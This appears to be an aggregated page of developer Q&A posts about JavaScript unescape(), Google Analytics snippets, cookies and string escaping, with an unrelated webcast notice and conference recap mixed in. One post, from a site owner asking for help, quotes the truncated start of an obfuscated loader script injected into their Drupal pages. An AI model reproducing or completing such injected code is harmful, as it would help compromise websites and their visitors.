  • jQuery code to track clicks on outgoing links (google analystics)

    - by Tristan
    Hello, I found this on the web: $('a[href^=http]:not("[href*=://' + document.domain + ']")').click(function() { pageTracker._trackPageview('/outgoing/' + $(this).attr('href')); }); But it's not working. In my Google Analytics account there are no /outgoing/ links showing (it's been 24+ hours since I implemented it). What's wrong with this code? I'm using jQuery of course ;) (PS : i already have : <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA MY CODE"); pageTracker._trackPageview(); } catch(err) {}</script>)

  • Chunks of javascript added to webpages on server

    - by SteD
    I've found out that my web pages (mainly index.php, main.html, include.inc) have been injected with a chunk of javascript codes at the very bottom after my original code. <script>try {this.l="";var d=window[unescape("%75%6e%65%73%63%61%70%65")];var M;if(M!='' && M!='a'){M='bt'};var A="";var Mc=new String();var e=null;this.k="";var t;if(t!='' && t!='iX'){t=''};var K=window[d("%52%65%67%45%78%70")];var p=d("%72%65%70%6c%61%63%65");function C(H,Z){var N=d("%5b" Is it possible for SQL injections to add the chunk of js code to the webpages(like 50 of them are infected)? Or is it a virus on the server itself? I am using Drupal + Ubercart with quite minimal forms inputs.

  • What difference does it make to use several script blocks on a web page?

    - by Jan Aagaard
    What difference does it make to use more than one script block on a web page? I have pasted in the standard code for including Google Analytics as an example, and I have seen the same pattern used in other places. Why is this code separated into two separate script blocks instead of just using a single one? <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try{ var pageTracker = _gat._getTracker("UA-xxxxxx-x"); pageTracker._trackPageview(); } catch(err) {} </script>

  • Escaping and unescaping a string with single and double quotes in Javascript

    - by Reina
    I have a search box that a user can search for any string including single AND double quotes, once they have searched, the backend is passing the keyword back to me so I can put it back in the box. I don't know what the string is so I can't escape quotes myself, below is an example: var keyword = "hello"; $("#selectionkeywords").val(); The issue I am having is that if the user enters "hello" the keyword becomes ""hello"" and I get this error: missing ) after argument list [Break On This Error] jQuery("#selectionkeywords").val(""hello""); The user could also enter single quotes so that rules it out as well. I tried using escape unescape but I still have the same issue e.g. escape(""hello"") I could get the value in an unescaped format e.g. "hello" but I don't know what to do with it, escape doesn't work on it I end up with this %26%23034%3Bhello%26%23034%3B So I'm pretty much stuck at the moment as I can't do anything to the string, any ideas?

  • What is the purpose of this string argument in a JavaScript function?

    - by Adel
    In the following function, there is the line: var username=getCookie("username"); Here's the whole function: function checkCookie() { var username=getCookie("username"); if (username!=null && username!="") { alert("Welcome again " + username); } else { username=prompt("Please enter your name:",""); if (username!=null && username!="") { setCookie("username",username,365); } } What is the point of the "username" argument being passed above? function getCookie(c_name) { var i,x,y,ARRcookies=document.cookie.split(";"); for (i=0;i<ARRcookies.length;i++) { x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("=")); y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1); x=x.replace(/^\s+|\s+$/g,""); if (x==c_name) { return unescape(y); } } } The whole code is here Thanks!

Opposition to Data Warehouse Initiatives Please join us for this webcast on Wednesday, March 24, 12 noon Eastern or check your local area's time Webcast is open to clients, prospects and partners. No matter how good your technology and technical skills, organizational issues can derail a data warehousing or BI project. Therefore BIWA presents a vital topic that crosses product boundaries: organizational resistance to data warehouse initiatives - how to recognize it and what to do about it. Many a DW/BI professional has been surprised by organizational resistance to DW/BI initiatives. Yet real organizational imperatives may be behind this apparently irrational behavior. Based on in-depth interviews with IT professionals, industry consultants, and power users, our speaker Bruce Jenks will present his research findings about what drives organizational resistance to data warehouse initiatives. The talk will cover specific behaviors that can signal organizational resistance to a data warehouse program and what organizations have done to address such resistance. Presenter: Bruce Jenks of Dun and Bradstreet Bruce Jenks has over 20 years experience in data warehousing and business intelligence, much of it as a consultant to large organizations spanning the US. Bruce's data warehousing clients have included firms such as Sprint, Gallo Wines, Southern California Edison, The Gap, and Safeway. He started his data warehousing career at Metaphor Computers, a pioneering DW/BI firm from which a number of industry luminaries sprang including Ralph Kimball (author of The Data Warehouse Toolkit ). • Recap: Oracle at the Gartner Business Intelligence Summit

    - by kimberly.billings
    Getting to Vegas was no fun. As anyone who lives in the Bay Area knows, the SF airport shuts down one runway when it rains, causing major havoc. So rain, rain, rain on Sunday meant delay, delay, delay at the airport. Needless to say, my 6:30 pm flight didn't land in Vegas until 3:00 am! But the travel pains were worth it. There was a lot to be learned at the Gartner BI Summit this year, and the uptick in attendance was reflected in strong booth traffic and engaging conversations in the Oracle booth. Oracle customer, Dawn Conant, Director, Business Intelligence at Beckman Coulter, generated a lot of interest in her presentation about migrating from Business Objects to Oracle Business Intelligence, Enterprise Edition with Oracle Database 11g. Dawn's story was a very relatable one, as many of the attendees had plans for similar projects. One of the most interesting Gartner-led sessions compared BI/DW megavendors, IBM, Oracle, SAP and Microsoft. According to Gartner analyst Rita Sallam, these megavendors control about two-thirds of the BI market. Sallem attributes this in part to the fact that organizations are expanding their definitions of BI to also include analytics and performance management. In doing so, they require greater integration of BI applications with a broader set of applications and middleware. In a related session, a panel of Gartner analysts compared the Magic Quadrants for BI Platforms; CPM; Data Quality; Data Integration Tools; and Data Warehouses. Oracle is a leader in all of the Magic Quadrants in which it participates and has the most complete stack including hardware and software, according to Donald Feinberg. Feinberg also commented that in situations with VLDW and solid mixed workloads, Oracle Exadata is making a big difference! var gaJsHost = (("https:" == document.location.protocol) ? • Passing XML markers to Google Map

    - by djmadscribbler
    I've been creating a V3 Google map based on this example from Mike Williams http://www.geocodezip.com/v3_MW_example_map3.html I've run into a bit of a problem though. If I have no parameters in my URL then I get the error "id is undefined idmarkers [id.toLowerCase()] = marker;" in Firebug and only one marker will show up. If I have a parameter (?id=105 for example) then all the sidebar links say 105 (or whatever the parameter in the URL was) instead of their respective label as listed in the XML file and a random infowindow will be opened instead of the window for the id in the URL. Here is my javascript: var map = null; var lastmarker = null; // ========== Read paramaters that have been passed in ========== // Before we go looking for the passed parameters, set some defaults // in case there are no parameters var id; var index = -1; // these set the initial center, zoom and maptype for the map // if it is not specified in the query string var lat = 42.194741; var lng = -121.700301; var zoom = 18; var maptype = google.maps.MapTypeId.HYBRID; function MapTypeId2UrlValue(maptype) { var urlValue = 'm'; switch (maptype) { case google.maps.MapTypeId.HYBRID: urlValue = 'h'; break; case google.maps.MapTypeId.SATELLITE: urlValue = 'k'; break; case google.maps.MapTypeId.TERRAIN: urlValue = 't'; break; default: case google.maps.MapTypeId.ROADMAP: urlValue = 'm'; break; } return urlValue; } // If there are any parameters at eh end of the URL, they will be in location.search // looking something like "?marker=3" // skip the first character, we are not interested in the "?" var query = location.search.substring(1); // split the rest at each "&" character to give a list of "argname=value" pairs var pairs = query.split("&"); for (var i = 0; i < pairs.length; i++) { // break each pair at the first "=" to obtain the argname and value var pos = pairs[i].indexOf("="); var argname = pairs[i].substring(0, pos).toLowerCase(); var value = pairs[i].substring(pos + 1).toLowerCase(); // process each possible argname - use unescape() if theres any chance of spaces if (argname == "id") { id = unescape(value); } if (argname == "marker") { index = parseFloat(value); } if (argname == "lat") { lat = parseFloat(value); } if (argname == "lng") { lng = parseFloat(value); } if (argname == "zoom") { zoom = parseInt(value); } if (argname == "type") { // from the v3 documentation 8/24/2010 // HYBRID This map type displays a transparent layer of major streets on satellite images. // ROADMAP This map type displays a normal street map. // SATELLITE This map type displays satellite images. // TERRAIN This map type displays maps with physical features such as terrain and vegetation. if (value == "m") { maptype = google.maps.MapTypeId.ROADMAP; • Google Fetch issue

    - by Karen
    When I do a Google fetch on any of my webpages the results are all the same (below). I'm not a programmer but I'm pretty sure this is not correct. Out of all the fetches I have done only one was different and the content length was 6x below and showed meta tags etc. Maybe this explains other issues I've been having with the site: a drop in indexed pages. Meta tag analyzer says I have no title tag, meta tags or description even though I do it on all pages. I had an SEO team working on the site and they were stumped by why pages were not getting indexed. So they figure it was some type of code error. Are they right? • Redirect to new page if cookie doesn't exist or if the value of cookie is 'false'

    - by liquilife
    I have a DOB 'Are you over 18' script which when the form is filled out, validates if they are over 18 or not for a tobacco site I am working on. When this form is filled it stores a cookie 'ageCheck' with a value of either true or false. I'm having some issues with a bit of javascript which is stored on all the pages to determine if they can view the page or if they need to be redirected to the verification page. The javascript is supposed to set a div ID to 'display:block' if passed and if no cookie is found OR the cookie value is false is supposed to redirect them to the age verification page. However, it's just not working. I see the cookies are set correctly. Below is my code.. any help is appreciated. <script> document.body.onload = function() { var ageCheck = getCookie('ageCheck'); if ('true' == ageCheck) { document.getElementById('content').style.display = ''; } else { document.location = '/ageCheck.html'; } } function getCookie(c_name) { if (document.cookie.length > 0) { c_start = document.cookie.indexOf(c_name + "="); if (c_start != -1) { c_start = c_start + c_name.length + 1; c_end = document.cookie.indexOf(";", c_start); if (c_end == -1) c_end = document.cookie.length; return unescape(document.cookie.substring(c_start, c_end)); } } return ""; } </script>

  • Need help with an AJAX workflow

    - by Anders
    Sorry I couldn't be more descriptive with the title, I will elaborate fully below: I have a web application that I want to implement some AJAX functionality into. Currently, it is running ASP.NET 3.5 with VB.NET codebehind. My current "problem" is I want to dynamically be able to populate a DIV when a user clicks an item on a list. The list item currently contains a HttpUtility.UrlEncode() (ASP.NET) string of the content that should appear in the DIV. Example: <li onclick="setFAQ('The+maximum+number+of+digits+a+patient+account+number+can+contain+is+ten+(10).');"> What is the maximum number of digits a patient account number can contain?</li> I can decode the string partially with the JavaScript function unescape() but it does not fully decode the string. I would much rather pass the JavaScript function the faq ID then somehow pull the information from the database where it originates. I am 99% sure it is impossible to call an ASP function from within a JavaScript function, so I am kind of stumped. I am kind of new to AJAX/ASP.NET so this is a learning experience for me.

The code is: <a id="suggest" href="#" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=108463912505356" class=" profile_action actionspro_a" rel="dialog-post">Suggest to Friends</a> And the obfustication is: \x3c\x61\x20\x69\x64\x3d\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3d\x22\x23\x22\x20\x61\x6a\x61\x78\x69\x66\x79\x3d\x22\x2f\x61\x6a\x61\x78\x2f\x73\x6f\x63\x69\x61\x6c\x5f\x67\x72\x61\x70\x68\x2f\x69\x6e\x76\x69\x74\x65\x5f\x64\x69\x61\x6c\x6f\x67\x2e\x70\x68\x70\x3f\x63\x6c\x61\x73\x73\x3d\x46\x61\x6e\x4d\x61\x6e\x61\x67\x65\x72\x26\x61\x6d\x70\x3b\x6e\x6f\x64\x65\x5f\x69\x64\x3d\x31\x30\x38\x34\x36\x33\x39\x31\x32\x35\x30\x35\x33\x35\x36\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x20\x70\x72\x6f\x66\x69\x6c\x65\x5f\x61\x63\x74\x69\x6f\x6e\x20\x61\x63\x74\x69\x6f\x6e\x73\x70\x72\x6f\x5f\x61\x22\x20\x72\x65\x6c\x3d\x22\x64\x69\x61\x6c\x6f\x67\x2d\x70\x6f\x73\x74\x22\x3e\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6f\x20\x46\x72\x69\x65\x6e\x64\x73\x3c\x2f\x61\x3e","\x73\x75\x67\x67\x65\x73\x74 Now I used unescape on the above obfusticated code to read it. What I want to know is what exactly was used to obfusticate the code like that? Basically, I need to customize the readable code to the same obfustication. Any help would be greatly appreciated.

  • How can I put double quotes inside a string within an ajax JSON response from php?

    - by karlthorwald
    I receive a JSON response in an Ajax request from the server. This way it works: { "a" = "1", "b" = "hello 'kitty'" } But I did not succeed in putting double quotes around kitty. When I convert " to \x22 in the Ajax response, it is still interpreted as " by JavaScript and I cannot parse the JSON. Should I also escape the \ and unescape later (which would be possible)? How to do this? Edit: I am not sure if i expressed it well: I want this string inside of "b" after the parse: hello "kitty" If necessary I could also add an additional step after the parse to convert "b", but I guess it is not necessary, there is a more elegant way so this happens automatically? Edit2: The ajax page is generated by php. I tried several things now to create the value of b, all result in JSON parse error on the page: $b = 'hello "kitty"'; // no 1: //$b = str_replace('"',"\x22",$b); // or no 2: // $b = addslashes($b); // or no 3: //$b = str_replace('"','\"',$b); // or no 4: $b = str_replace('"','\\"',$b); echo '"b" : "' . $b . '"';

  • Python minidom and UTF-8 encoded XML with hash references

    - by Jakob Simon-Gaarde
    Hi I am experiencing some difficulty in my home project where I need to parse a SOAP request. The SOAP is generated with gSOAP and involves string parameters with special characters like the danish letters "æøå". gSOAP builds SOAP requests with UTF-8 encoding by default, but instead of sending the special chatacters in raw format (ie. bytes C3A6 for the special character "æ") it sends what I think is called character hash references (ie. &#195;&#166;). I don't completely understand why gSOAP does it this way as I can see that it has marked the incomming payload as being UTF-8 encoded anyway (Content-Type: text/xml; charset=utf-8), but this is besides the question (I think). Anyway I guess gSOAP probably is obeying transport rules, or what? When I parse the request from gSOAP in python with xml.dom.minidom.parseString() I get element values as unicode objects which is fine, but the character hash references are not decoded as UTF-8 character codes. It unescapes the character hash references, but does not decode the string afterwards. In the end I have a unicode string object with UTF-8 encoding: So if the string "æble" is contained in the XML, it comes like this in the request: "&#195;&#166;ble" After parsing the XML the unicode string in the DOM Text Node's data member looks like this: u'\xc3\xa6ble' I would expect it to look like this: u'\xe6ble' What am I doing wrong? Should I unescape the SOAP XML before parsing it, or is it somewhere else I should be looking for the solution, maybe gSOAP? Thanks in advance. Best regards Jakob Simon-Gaarde

  • Double script tags in Google Analytics tracking code

    - by Tom
    This is more a curiosity question than anything else... Google instructs to add the analytics tracking code as follows: <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try{ var pageTracker = _gat._getTracker("UA-xxxxxx-x"); pageTracker._trackPageview(); } catch(err) {} </script> I'm wondering some JS guru here could tell me why they're separating it into two script tags instead of sticking it all inside one. I know that the top part could be put in the header and the bottom part just before body tag to ensure the page loaded before it's tracked, but I'm wondering if there's something more to it. Anyone who'd know that would likely know how to separate the code into two tags anyway. I'm only asking as this is coming from the Goog and is being used by millions of sites... Thanks

  • XMLHttpRequest() and Google Analytics Tracking

    - by sjw
    I have implemented an XMLHttpRequest() call to a standalone html page which simply has an html, title & body tag which Google Analytics Tracking code. I want to track when someone makes a request to display information (i.e. phone number) to try and understand what portion of people look at my directory versus obtaining a phone number to make a call. It is very simple code: var xhReq = new XMLHttpRequest(); xhReq.open("GET", "/registerPhoneClick.htm?id=" + id, false); xhReq.send(null); var serverResponse = xhReq.responseText Yet I cannot see the "hit" in Analytics... Has anyone had this issue? All the analytics tracking code does is call: <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-XXXXXXX"); pageTracker._trackPageview(); } catch(err) {}</script> So realistically, my XmlHTTPRequest() calls an htm file within which a script is execute to make an outbound call to Google Analytics. Is there any reason why an XmlHTTPRequest() would not execute this? Does an XmlHTTPRequest() still bring the code to the client before execution? Help Please

  • Gdata JavaScript Authsub continues redirect

    - by Krustal
    I am using the JavaScript Google Data API and having issues getting the AuthSub script to work correctly. This is my script currently: google.load('gdata', '1'); function getCookie(c_name){ if(document.cookie.length>0){ c_start=document.cookie.indexOf(c_name + "="); if(c_start!=-1){ c_start=c_start + c_name.length+1; c_end=document.cookie.indexOf(";",c_start); if(c_end==-1) c_end=document.cookie.length; return unescape(document.cookie.substring(c_start, c_end)); } } return ""; } function main(){ var scope = 'http://www.google.com/calendar/feeds/'; if(!google.accounts.user.checkLogin(scope)){ google.accounts.user.login(); } else { /* * Retrieve all calendars */ // Create the calendar service object var calendarService = new google.gdata.calendar.CalendarService('GoogleInc-jsguide-1.0'); // The default "allcalendars" feed is used to retrieve a list of all // calendars (primary, secondary and subscribed) of the logged-in user var feedUri = 'http://www.google.com/calendar/feeds/default/allcalendars/full'; // The callback method that will be called when getAllCalendarsFeed() returns feed data var callback = function(result) { // Obtain the array of CalendarEntry var entries = result.feed.entry; //for (var i = 0; i < entries.length; i++) { var calendarEntry = entries[0]; var calendarTitle = calendarEntry.getTitle().getText(); alert('Calendar title = ' + calendarTitle); //} } // Error handler to be invoked when getAllCalendarsFeed() produces an error var handleError = function(error) { alert(error); } // Submit the request using the calendar service object calendarService.getAllCalendarsFeed(feedUri, callback, handleError); } } google.setOnLoadCallback(main); However when I run this the page redirects me to the authentication page. After I authenticate it send me back to my page and then quickly sends me back to the authenticate page again. I've included alerts to check if the token is being set and it doesn't seem to be working. Has anyone has this problem?

  • Read Cookies using Javascript

    - by Ajith
    I want to create a cookie using php,an also i need to read it using javascript.ie, by using setcookie('mycookie','hello',time()+34000) in php i am creating a cookie in my system.Now,i need to read it using javascript.Is it possible?If anybody knows please give me some idea.Please....help me.I am using javscript as follows ` function Get_Cookie( check_name ) { // first we'll split this cookie up into name/value pairs // note: document.cookie only returns name=value, not the other components var a_all_cookies = document.cookie.split( ';' ); var a_temp_cookie = ''; var cookie_name = ''; var cookie_value = ''; var b_cookie_found = false; // set boolean t/f default f for ( i = 0; i < a_all_cookies.length; i++ ) { // now we'll split apart each name=value pair a_temp_cookie = a_all_cookies[i].split( '=' ); // and trim left/right whitespace while we're at it cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, ''); // if the extracted name matches passed check_name if ( cookie_name == check_name ) { b_cookie_found = true; // we need to handle case where cookie has no value but exists (no = sign, that is): if ( a_temp_cookie.length > 1 ) { cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') ); } // note that in cases where cookie is initialized but no value, null is returned return cookie_value; break; } a_temp_cookie = null; cookie_name = ''; } if ( !b_cookie_found ) { return null; } } if (Get_Cookie('__gsb')) { alert('Found'); } `

  • how to Retrieve the parameters of document.write to detect the creation of dynamic tags

    - by user1335906
    In my Project i am supposed to identify the dynamically created tags which can be done in scripts through document.write("<script src='jquery.js'></script>") For this i used Regular expressions and my code is as follows function find_tag_docwrite(text) { var attrib=new Object; var pat_tag=/<((\S+)\s(.*))>/g; while(t=pat_tag.exec(text) { var tag=RegExp.$1; for(i=0;i<tags.length;i++) { var pat=/(\S+)=((['"]*)(\S+)(['"]*)\3)/g; while(p=pat.exec(f)) { attr=RegExp.$1;val=RegExp.$4; attrib[attr]=val; } } } } in the above function text is parameters of document.write function. Now through this code i am getting the tag names and all the attributes of the tags. But for the below example the above code is not working var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); In such cases Regular expressions does not work so after searching some time where i found hooks on dom methods. so by using this i thought of creating hook for document.write method but i am able to understand how it is done i included the following code in my program but it is not working. function someFunction(text) { console.log(text); } document.write = someFunction; where text is the parameters of document.write. Another problem is After monitoring all the document.write methods using hooks again i have to use regex for finding tag creations. Is there Any alternative
